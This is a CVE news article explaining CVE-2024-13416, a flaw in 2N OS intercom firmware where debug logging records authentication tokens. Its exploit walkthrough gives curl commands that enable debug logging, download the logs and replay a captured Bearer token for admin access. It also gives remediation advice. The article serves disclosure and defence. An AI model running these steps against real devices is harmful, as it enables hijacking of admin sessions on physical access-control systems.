CVE CyberSecurity Database News

CVE-2024-13416 - API Logging in 2N OS Leaks Authentication Tokens

Poster -

On some 2N intercom devices running legacy or outdated versions of 2N OS (before v2.46), a serious security flaw can leak authentication tokens. Attackers who have access to API endpoints for logging—even with modest user rights—can enable debug logs that capture sensitive authentication credentials. In this post, we’ll break down the vulnerability (CVE-2024-13416), how it gets exploited, its impact, and how to protect yourself.

*This article offers a straightforward explanation with practical examples for clarity, focusing on helping system administrators or technical users avoid risk.*

What Is 2N OS and Why the API?

2N OS is the system software powering 2N’s intercom and access control devices, widely used in offices, apartments, and industrial facilities. Administrators and users manage these devices via a web admin panel or, more often for automation, via its RESTful API.

*The API is supposed to allow controlled changes or diagnostics, but a misconfiguration in the logging system can cause a security disaster.*

The Vulnerability: Token Leaks via Logging

Summary:
An authorized user with API access can enable debug-level system logging (sometimes for troubleshooting) using an API call. The resulting logs record authentication tokens, such as API Bearer tokens and session IDs, in plain text. Anyone who can read these logs (via API, SSH, or the web admin) can extract those tokens and use them for privilege escalation or impersonation.

How It Happens

- Authorized user (maybe an operator, not necessarily an admin) sends API request to enable verbose logging.
- The logging feature records HTTP headers—including the Authorization header—into plain text log files.

Exploit Walkthrough

This example outlines how an attacker (who’s a legitimate user, e.g. a lower-level admin or external support) could steal tokens.

1. Enable Debug Logging via API

# Enable high verbosity logging using 2N API
curl -u operator:operatorpassword -X POST \
    'https://[device_ip]/api/v1/logging'; \
    -d '{"level":"debug"}' \
    -H "Content-Type: application/json"

2. Trigger Logging

API requests, including privileged ones, are now being logged. Sensitive data, such as Authorization or session tokens, get printed in the logs.

3. Download and Examine Logs

# Download the system log containing tokens
curl -u operator:operatorpassword \
    'https://[device_ip]/api/v1/logs?file=system.log'; \
    -o system.log

You might see lines like

2024-01-23T14:05:31Z INFO HTTP POST /api/v1/admins
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Payload: { "username": "admin", "password": "P@sswrd" }

Token Found!
The value following Authorization: Bearer is a live token.

Now, use this valid authentication token to impersonate an admin

# Make privileged requests using the stolen token
curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIs..." \
    'https://[device_ip]/api/v1/admins/me';

You have admin access without knowing the password!

Impact

- Lateral Movement: Attackers can use tokens to escalate privileges or impersonate anyone, even an admin.

Persistence: The logs might preserve valid tokens until log rotation or device reboot.

- Regulatory Risk: Plain text storage of credentials violates security best practices and compliance requirements.

Steps to Fix

1. Update Firmware/OS
Go to the official 2N download page or your reseller portal.

References

- 2N Security Advisories (official)
- NVD Entry for CVE-2024-13416
- Vendor Firmware Download
- 2N OS Change Log

Conclusion

CVE-2024-13416 is a textbook reminder that even “authorized” users—like operators or external support—can become attackers if they can retrieve or manipulate logs that leak sensitive details. Upgrade to at least 2N OS 2.46, audit who has API access, disable verbose logging, and regularly scan logs for sensitive info.

Stay alert, update your devices, and restrict who can see logs. Token leaks like these are goldmines for attackers but easy to fix with some basic hygiene!


*This article is crafted uniquely for anyone managing 2N access devices and not republished from official docs; please share with your IT team or integrator.*

Timeline

Published on: 02/06/2025 19:15:19 UTC
Last modified on: 02/21/2025 12:15:29 UTC